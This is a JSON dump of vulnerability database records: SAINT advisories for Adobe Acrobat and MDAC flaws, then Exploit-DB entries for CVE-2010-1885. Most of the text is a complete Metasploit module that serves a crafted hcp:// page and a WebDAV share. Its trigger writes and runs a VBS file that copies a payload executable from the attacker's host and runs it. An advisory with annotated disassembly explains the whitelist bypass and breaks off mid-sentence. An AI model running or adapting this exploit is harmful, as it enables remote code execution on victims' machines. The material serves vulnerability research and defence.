\n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2009-03-27T00:00:00", "published": "2009-03-27T00:00:00", "id": "SAINT:3FD55356C59C08B007A70159ACFB7A63", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_acrobat_javascript_geticon", "title": "Adobe Acrobat JavaScript getIcon method buffer overflow ", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "description": "Added: 07/16/2007 \nCVE: [CVE-2006-0003](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>) \nBID: [17462](<http://www.securityfocus.com/bid/17462>) \nOSVDB: [24517](<http://www.osvdb.org/24517>) \n\n\n### Background\n\n[Microsoft Data Access Components (MDAC)](<http://support.microsoft.com/kb/842193/>) enable Universal Data Access in Windows applications deployed over a network. \n\n### Problem\n\nA cross-zone scripting vulnerability in the RDS.Dataspace ActiveX control in MDAC allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 06-014](<http://www.microsoft.com/technet/security/bulletin/MS06-014.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/234812> \n\n\n### Limitations\n\nOn Windows 2000, MDAC must be installed. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-07-16T00:00:00", "published": "2007-07-16T00:00:00", "id": "SAINT:D7F75EFDCAC463A90F06C660FBFD2D10", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/mdac_rds_dataspace", "type": "saint", "title": "Windows MDAC RDS.Dataspace ActiveX control vulnerability", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "description": "Added: 07/16/2007 \nCVE: [CVE-2006-0003](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>) \nBID: [17462](<http://www.securityfocus.com/bid/17462>) \nOSVDB: [24517](<http://www.osvdb.org/24517>) \n\n\n### Background\n\n[Microsoft Data Access Components (MDAC)](<http://support.microsoft.com/kb/842193/>) enable Universal Data Access in Windows applications deployed over a network. \n\n### Problem\n\nA cross-zone scripting vulnerability in the RDS.Dataspace ActiveX control in MDAC allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 06-014](<http://www.microsoft.com/technet/security/bulletin/MS06-014.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/234812> \n\n\n### Limitations\n\nOn Windows 2000, MDAC must be installed. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2007-07-16T00:00:00", "published": "2007-07-16T00:00:00", "id": "SAINT:BC1DB9AB9516112650D9CE49519F32F1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mdac_rds_dataspace", "title": "Windows MDAC RDS.Dataspace ActiveX control vulnerability", "type": "saint", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:46", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "edition": 2, "description": "Added: 07/16/2007 \nCVE: [CVE-2006-0003](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>) \nBID: [17462](<http://www.securityfocus.com/bid/17462>) \nOSVDB: [24517](<http://www.osvdb.org/24517>) \n\n\n### Background\n\n[Microsoft Data Access Components (MDAC)](<http://support.microsoft.com/kb/842193/>) enable Universal Data Access in Windows applications deployed over a network. \n\n### Problem\n\nA cross-zone scripting vulnerability in the RDS.Dataspace ActiveX control in MDAC allows command execution when a user loads a specially crafted web page. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 06-014](<http://www.microsoft.com/technet/security/bulletin/MS06-014.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/234812> \n\n\n### Limitations\n\nOn Windows 2000, MDAC must be installed. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-07-16T00:00:00", "published": "2007-07-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mdac_rds_dataspace", "id": "SAINT:191E4D213693C8769F03A620EE4E529A", "type": "saint", "title": "Windows MDAC RDS.Dataspace ActiveX control vulnerability", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T00:06:28", "description": "Microsoft Help Center XSS and Command Execution. CVE-2010-1885. 
Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16545", "href": "https://www.exploit-db.com/exploits/16545/", "sourceData": "##\r\n# $Id: ms10_042_helpctr_xss_cmd_exec.rb 10388 2010-09-20 04:37:25Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Microsoft Help Center XSS and Command Execution',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tHelp and Support Center is the default application provided to access online\r\n\t\t\t\tdocumentation for Microsoft Windows. Microsoft supports accessing help documents\r\n\t\t\t\tdirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\r\n\t\t\t\tan error in validation of input to hcp:// combined with a local cross site\r\n\t\t\t\tscripting vulnerability and a specialized mechanism to launch the XSS trigger,\r\n\t\t\t\tarbitrary command execution can be achieved.\r\n\r\n\t\t\t\tOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\r\n\t\t\t\tcan be used to launch the exploit automatically. If IE8 and WMP11, either can\r\n\t\t\t\tbe used to launch the attack, but both pop dialog boxes asking the user if\r\n\t\t\t\texecution should continue. 
This exploit detects if non-intrusive mechanisms are\r\n\t\t\t\tavailable and will use one if possible. In the case of both IE8 and WMP11, the\r\n\t\t\t\texploit defaults to using an iframe on IE8, but is configurable by setting the\r\n\t\t\t\tDIALOGMECH option to \"none\" or \"player\".\r\n\t\t\t},\r\n\t\t\t'Author'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Tavis Ormandy', # Original discovery\r\n\t\t\t\t\t'natron' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'License'\t\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t\t=> '$Revision: 10388 $',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1885' ],\r\n\t\t\t\t\t[ 'OSVDB', '65264' ],\r\n\t\t\t\t\t[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2219475.mspx' ],\r\n\t\t\t\t\t[ 'MSB', 'MS10-042']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload'\t\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t=> 2048,\r\n\t\t\t\t},\r\n\t\t\t'Platform'\t\t=> 'win',\r\n\t\t\t'Targets'\t\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic',\t{ } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 09 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptPort.new(\t'SRVPORT',\t\t [ true, \"The daemon port to listen on\", 80 ]),\r\n\t\t\t\tOptString.new(\t'URIPATH',\t\t [ true, \"The URI to use.\", \"/\" ]),\r\n\t\t\t\tOptString.new(\t'DIALOGMECH',\t [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"])\r\n\t\t\t], self.class)\r\n\r\n\t\tderegister_options('SSL', 'SSLVersion') # Just for now\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# If there is no subdirectory in the request, we need to redirect.\r\n\t\tif (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//)\r\n\t\t\tif (request.uri == '/')\r\n\t\t\t\tsubdir = '/' + rand_text_alphanumeric(8+rand(8)) + 
'/'\r\n\t\t\telse\r\n\t\t\t\tsubdir = request.uri + '/'\r\n\t\t\tend\r\n\t\t\tprint_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\")\r\n\t\t\tsend_redirect(cli, subdir)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\r\n\t\tcase request.method\r\n\t\twhen 'OPTIONS'\r\n\t\t\tprocess_options(cli, request)\r\n\t\twhen 'PROPFIND'\r\n\t\t\tprocess_propfind(cli, request)\r\n\t\twhen 'GET'\r\n\t\t\tprocess_get(cli, request)\r\n\t\telse\r\n\t\t\tprint_error(\"Unexpected request method encountered: #{request.method}\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef process_get(cli, request)\r\n\r\n\t\t@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\twebdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\"\r\n\t\t@url_base = \"http://\" + @my_host\r\n\r\n\t\tif (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))\r\n\t\t\tprint_status \"Sending payload executable to target ...\"\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri.match(/\\.gif$/)\r\n\t\t\t# \"world's smallest gif\"\r\n\t\t\tdata = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\"\r\n\t\t\tdata += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\"\r\n\t\t\tprint_status \"Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ...\"\r\n\t\t\tsend_response(cli, data, { 'Content-TYpe' => 'image/gif' } )\r\n\t\tend\r\n\r\n\t\t# ASX Request Inbound\r\n\t\tif request.uri.match(/\\.asx$/)\r\n\t\t\tasx = %Q|<ASX VERSION=\"3.0\">\r\n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/>\r\n<ENTRY>\r\n\t<REF href=\"URLBASE/IMGFILE\"/>\r\n</ENTRY>\r\n</ASX>\r\n|\r\n\t\t\tasx.gsub!(/URLBASE/, 
@url_base)\r\n\t\t\tasx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help)\r\n\t\t\tasx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file)\r\n\t\t\tprint_status(\"Sending asx file to #{cli.peerhost}:#{cli.peerport} ...\")\r\n\t\t\tsend_response(cli, asx, { 'Content-Type' => 'text/html' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# iframe request inbound from either WMP or IE7\r\n\t\tif request.uri.match(/#{@start_help}/)\r\n\r\n\t\t\thelp_html = %Q|<iframe src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">|\r\n\r\n\t\t\trand_vbs\t= rand_text_alpha(rand(2)+1) + \".vbs\"\r\n\t\t\tcopy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^\r\n\t\t\tvbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false|\r\n\t\t\twrite_vbs\t= %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}|\r\n\t\t\tlaunch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul|\r\n\t\t\tconcat_cmds = \"#{write_vbs}|#{launch_vbs}\"\r\n\r\n\t\t\teval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\"\r\n\t\t\teval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))\r\n\t\t\thelp_html.gsub!(/COMMANDS/, eval_block)\r\n\t\t\tprint_status(\"Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...\")\r\n\t\t\tsend_response(cli, help_html, { 
'Content-Type' => 'text/html' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# default initial response\r\n\t\tjs = %Q|\r\nvar asx = \"URLBASE/ASXFILE\";\r\nvar ifr = \"URLBASE/IFRFILE\";\r\n\r\nfunction launchiframe(src) {\r\n\tvar o = document.createElement(\"IFRAME\");\r\n\to.setAttribute(\"width\",\"0\");\r\n\to.setAttribute(\"height\",\"0\");\r\n\to.setAttribute(\"frameborder\",\"0\");\r\n\to.setAttribute(\"src\",src);\r\n\tdocument.body.appendChild(o);\r\n}\r\n\r\nif (window.navigator.appName == \"Microsoft Internet Explorer\") {\r\n\tvar ua = window.navigator.userAgent;\r\n\tvar re = new RegExp(\"MSIE ([0-9]{1,}[\\.0-9]{0,})\");\r\n\tre.exec(ua)\r\n\tver = parseFloat( RegExp.$1 );\r\n\r\n\t// if ie8, check WMP version\r\n\tif (ver > 7) {\r\n\t\tvar o = document.createElement(\"OBJECT\");\r\n\t\to.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\");\r\n\t\to.setAttribute(\"uiMode\", \"invisible\");\r\n\t\t// if wmp9, go ahead and launch\r\n\t\tif( parseInt(o.versionInfo) < 10 ) {\r\n\t\t\to.openPlayer(asx);\r\n\t\t// if > wmp9, only launch if user requests\r\n\t\t} else {\r\n\t\t\tDIALOGMECH\r\n\t\t}\r\n\t// if ie7, use iframe\r\n\t} else {\r\n\t\tlaunchiframe(ifr);\r\n\t}\r\n} else {\r\n\t// if other, try iframe\r\n\tlaunchiframe(ifr);\r\n}\r\n|\r\n\r\n\t\thtml = %Q|<html>\r\n<head></head><body><script>JAVASCRIPTFU\r\n</script>\r\n</body>\r\n</html>\r\n|\r\n\t\tcase datastore['DIALOGMECH']\r\n\t\twhen \"player\"\r\n\t\t\tmech = \"o.openPlayer(asx);\"\r\n\t\twhen \"iframe\"\r\n\t\t\tmech = \"launchiframe(ifr);\"\r\n\t\twhen \"none\"\r\n\t\t\tmech = \"\"\r\n\t\telse\r\n\t\t\tmech = \"\"\r\n\t\tend\r\n\r\n\t\thtml.gsub!(/JAVASCRIPTFU/, js)\r\n\t\thtml.gsub!(/DIALOGMECH/, mech)\r\n\t\thtml.gsub!(/URLBASE/, @url_base)\r\n\t\thtml.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file)\r\n\t\thtml.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help)\r\n\r\n\t\tprint_status(\"Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...\")\r\n\r\n\t\theaders 
= {\r\n\t\t\t'Content-Type'\t\t=> 'text/html',\r\n\t\t\t#'X-UA-Compatible'\t=> 'IE=7'\r\n\t\t}\r\n\r\n\t\tsend_response(cli, html, headers)\r\n\tend\r\n\r\n\t#\r\n\t# OPTIONS requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_options(cli, request)\r\n\t\tprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\")\r\n\t\theaders = {\r\n\t\t\t#'DASL' => '<DAV:sql>',\r\n\t\t\t#'DAV' => '1, 2',\r\n\t\t\t'Allow' => 'OPTIONS, GET, PROPFIND',\r\n\t\t\t'Public' => 'OPTIONS, GET, PROPFIND'\r\n\t\t}\r\n\t\tsend_response(cli, '', headers)\r\n\tend\r\n\r\n\tdef convert_to_char_code(str)\r\n\t\treturn str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop\r\n\tend\r\n\t#\r\n\t# PROPFIND requests sent by the WebDav Mini-Redirector\r\n\t#\r\n\tdef process_propfind(cli, request)\r\n\t\tpath = request.uri\r\n\t\tprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}\")\r\n\t\tbody = ''\r\n\r\n\t\tif (Regexp.new(Regexp.escape(@payload)+'$', true).match(path))\r\n\t\t\t# Response for the EXE\r\n\t\t\tprint_status(\"Sending EXE multistatus for #{path} ...\")\r\n#<lp1:getcontentlength>45056</lp1:getcontentlength>\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag>\r\n<lp2:executable>F</lp2:executable>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\t\telsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ 
/\\.exe/i)\r\n\t\t\tprint_status(\"Sending 404 for #{path} ...\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\r\n\t\telsif (path =~ /\\/$/) or (not path.sub('/', '').index('/'))\r\n\t\t\t# Response for anything else (generally just /)\r\n\t\t\tprint_status(\"Sending directory multistatus for #{path} ...\")\r\n\t\t\tbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>\r\n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>\r\n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n\r\n\t\telse\r\n\t\t\tprint_status(\"Sending 404 for #{path} ...\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# send the response\r\n\t\tresp = create_response(207, \"Multi-Status\")\r\n\t\tresp.body = body\r\n\t\tresp['Content-Type'] = 'text/xml'\r\n\t\tcli.send_response(resp)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@random_dir = rand_text_alpha(rand(2)+1)\r\n\t\t@asx_file\t= rand_text_alpha(rand(2)+1) + \".asx\"\r\n\t\t@start_help\t= rand_text_alpha(rand(2)+1) + \".html\"\r\n\t\t@payload\t= rand_text_alpha(rand(2)+1) + \".exe\"\r\n\t\t@img_file\t= rand_text_alpha(rand(2)+1) + \".gif\"\r\n\r\n\t\tif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n\t\t\traise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'\r\n\t\tend\r\n\r\n\t\tsuper\r\n\tend\r\nend\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16545/"}, {"lastseen": 
"2016-02-01T18:31:14", "description": "Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly. CVE-2010-1885. Remote exploit for windows platform", "published": "2010-06-10T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-06-10T00:00:00", "id": "EDB-ID:13808", "href": "https://www.exploit-db.com/exploits/13808/", "sourceData": "Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly\r\n----------------------------------------------------------------------------\r\n\r\nHelp and Support Centre is the default application provided to access online\r\ndocumentation for Microsoft Windows. Microsoft supports accessing help documents\r\ndirectly via URLs by installing a protocol handler for the scheme \"hcp\", \r\na typical example is provided in the Windows XP Command Line Reference,\r\navailable at http://technet.microsoft.com/en-us/library/bb490918.aspx.\r\n\r\nUsing hcp:// URLs is intended to be safe, as when invoked via the registered\r\nprotocol handler the command line parameter /fromhcp is passed to the help\r\ncentre application. This flag switches the help centre into a restricted mode,\r\nwhich will only permit a whitelisted set of help documents and parameters.\r\n\r\nThis design, introduced in SP2, is reasonably sound. A whitelist of trusted\r\ndocuments is a safe way of allowing interaction with the documentation from\r\nless-trusted sources. 
Unfortunately, an implementation error in the whitelist\r\nallows it to be evaded.\r\n\r\nURLs are normalised and unescaped prior to validation using\r\nMPC::HTML::UrlUnescapeW(), which in turn uses MPC::HexToNum() to translate URL\r\nescape sequences into their original characters, the relevant code from\r\nhelpctr.exe 5.1.2600.5512 (latest at time of writing) is below.\r\n\r\n.text:0106684C Unescape:\r\n.text:0106684C cmp di, '%' ; di contains the current wchar in the input URL.\r\n.text:01066850 jnz short LiteralChar ; if this is not a '%', it must be a literal character.\r\n.text:01066852 push esi ; esi contains a pointer to the current position in URL to unescape.\r\n.text:01066853 call ds:wcslen ; find the remaining length.\r\n.text:01066859 cmp word ptr [esi], 'u' ; if the next wchar is 'u', this is a unicode escape and I need 4 xdigits.\r\n.text:0106685D pop ecx ; this sequence calculates the number of wchars needed (4 or 2).\r\n.text:0106685E setz cl ; i.e. %uXXXX (four needed), or %XX (two needed).\r\n.text:01066861 mov dl, cl\r\n.text:01066863 neg dl\r\n.text:01066865 sbb edx, edx\r\n.text:01066867 and edx, 3\r\n.text:0106686A inc edx\r\n.text:0106686B inc edx\r\n.text:0106686C cmp eax, edx ; test if I have enough characters in input to decode.\r\n.text:0106686E jl short LiteralChar ; if not enough, this '%' is considered literal.\r\n.text:01066870 test cl, cl\r\n.text:01066872 movzx eax, word ptr [esi+2]\r\n.text:01066876 push eax\r\n.text:01066877 jz short NotUnicode\r\n.text:01066879 call HexToNum ; call MPC::HexToNum() to convert this nibble (4 bits) to an integer.\r\n.text:0106687E mov edi, eax ; edi contains the running total of the value of this escape sequence.\r\n.text:01066880 movzx eax, word ptr [esi+4]\r\n.text:01066884 push eax\r\n.text:01066885 shl edi, 4 ; shift edi left 4 positions to make room for the next digit, i.e. total <<= 4;\r\n.text:01066888 call HexToNum \r\n.text:0106688D or edi, eax ; or the next value into the 4-bit gap, i.e. 
total |= val.\r\n.text:0106688F movzx eax, word ptr [esi+6]; this process continues for the remaining wchars.\r\n.text:01066893 push eax\r\n.text:01066894 shl edi, 4\r\n.text:01066897 call HexToNum\r\n.text:0106689C or edi, eax\r\n.text:0106689E movzx eax, word ptr [esi+8]\r\n.text:010668A2 push eax\r\n.text:010668A3 shl edi, 4\r\n.text:010668A6 call HexToNum\r\n.text:010668AB or edi, eax\r\n.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668B0 jmp short FinishedEscape\r\n.text:010668B2\r\n.text:010668B2 NotUnicode: \r\n.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)\r\n.text:010668B7 mov edi, eax\r\n.text:010668B9 movzx eax, word ptr [esi]\r\n.text:010668BC push eax\r\n.text:010668BD call HexToNum\r\n.text:010668C2 shl eax, 4\r\n.text:010668C5 or edi, eax\r\n.text:010668C7 add esi, 4 ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668CA\r\n.text:010668CA FinishedEscape:\r\n.text:010668CA test di, di\r\n.text:010668CD jz short loc_10668DA\r\n.text:010668CF\r\n.text:010668CF LiteralChar:\r\n.text:010668CF push edi ; append the final value to the normalised string using a std::string append.\r\n.text:010668D0 mov ecx, [ebp+unescaped]\r\n.text:010668D3 push 1\r\n.text:010668D5 call std::string::append\r\n.text:010668DA mov di, [esi] ; fetch the next input character.\r\n.text:010668DD test di, di ; have we reached the NUL terminator?\r\n.text:010668E0 jnz Unescape ; process next char.\r\n\r\nThis code seems sane, but an error exists due to how MPC::HexToNum() handles\r\nerror conditions, the relevant section of code is annotated below.\r\n\r\n.text:0102D32A mov edi, edi\r\n.text:0102D32C push ebp\r\n.text:0102D32D mov ebp, esp ; function prologue.\r\n.text:0102D32F mov eax, [ebp+arg_0] ; fetch the character to convert.\r\n.text:0102D332 cmp eax, '0'\r\n.text:0102D335 jl short CheckUppercase ; is it a 
digit?\r\n.text:0102D337 cmp eax, '9'\r\n.text:0102D33A jg short CheckUppercase\r\n.text:0102D33C add eax, 0FFFFFFD0h ; atoi(), probably written val - '0' and optimised by compiler.\r\n.text:0102D33F jmp short Complete \r\n.text:0102D341 CheckUppercase:\r\n.text:0102D341 cmp eax, 'A'\r\n.text:0102D344 jl short CheckLowercase ; is it an uppercase xdigit?\r\n.text:0102D346 cmp eax, 'F'\r\n.text:0102D349 jg short CheckLowercase\r\n.text:0102D34B add eax, 0FFFFFFC9h ; atoi()\r\n.text:0102D34E jmp short Complete \r\n.text:0102D350 CheckLowercase:\r\n.text:0102D350 cmp eax, 'a'\r\n.text:0102D353 jl short Invalid ; lowercase xdigit?\r\n.text:0102D355 cmp eax, 'f'\r\n.text:0102D358 jg short Invalid \r\n.text:0102D35A add eax, 0FFFFFFA9h ; atoi()\r\n.text:0102D35D jmp short Complete \r\n.text:0102D35F Invalid: \r\n.text:0102D35F or eax, 0FFFFFFFFh ; invalid character, return -1\r\n.text:0102D362 Complete: \r\n.text:0102D362 pop ebp\r\n.text:0102D363 retn 4\r\n\r\nThus, MPC::HTML::UrlUnescapeW() does not check the return code of\r\nMPC::HexToNum() as required, and therefore can be manipulated into appending\r\nunexpected garbage onto std::strings. This error may appear benign, but we can\r\nuse the miscalculations produced later in the code to evade the /fromhcp\r\nwhitelist.\r\n\r\nAssuming that we can access arbitrary help documents (full details of how the\r\nMPC:: error can be used to accomplish this will be explained below), we must\r\nidentify a document that can be controlled purely from the URL used to access it.\r\n\r\nAfter browsing the documents available in a typical installation, the author\r\nconcluded the only way to do this would be a cross site scripting error. 
After\r\nsome careful searching, a candidate was discovered:\r\n\r\nhcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</h1>\r\n\r\nThis document is available in a default installation, and due to insufficient\r\nescaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable\r\nto a DOM-type XSS. However, the escaping routine will abort encoding if characters\r\nsuch as '=' or '\"' or others are specified. \r\n\r\nIt's not immediately obvious that this error is still exploitable, simple\r\ntricks like <img src=bad onerror=code> don't apply, and <script>code</script>\r\nisn't helpful as the code isn't evaluated again. In situations like this, the\r\nbest course of action is to harass lcamtuf until he gives you the solution,\r\nwhich of course his encyclopaedic knowledge of browser security quirks produced\r\nimmediately.\r\n\r\n<script defer>code</script>\r\n\r\nThe defer property is an IE-ism which solves the problem, documented 